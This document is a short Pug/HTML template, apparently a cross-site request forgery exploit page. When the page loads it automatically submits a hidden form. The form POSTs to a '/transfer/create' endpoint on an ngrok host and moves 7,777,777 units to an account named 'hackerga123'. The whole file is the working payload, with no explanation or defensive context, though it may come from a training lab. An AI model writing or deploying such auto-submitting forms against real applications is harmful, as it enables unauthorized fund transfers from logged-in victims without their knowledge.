doctype html
head
    meta(charset='UTF-8')
    meta(http-equiv='X-UA-Compatible', content='IE=edge')
    meta(name='viewport', content='width=device-width, initial-scale=1.0')
    title Document
body(onload="document.transferForm.submit()")
    form(action="http://ba78971802d9.ngrok.io/transfer/create", name="transferForm", method='POST')
        input(type='text', value='hackerga123', name='account')
        input(type='number', value='7777777', name='amount')
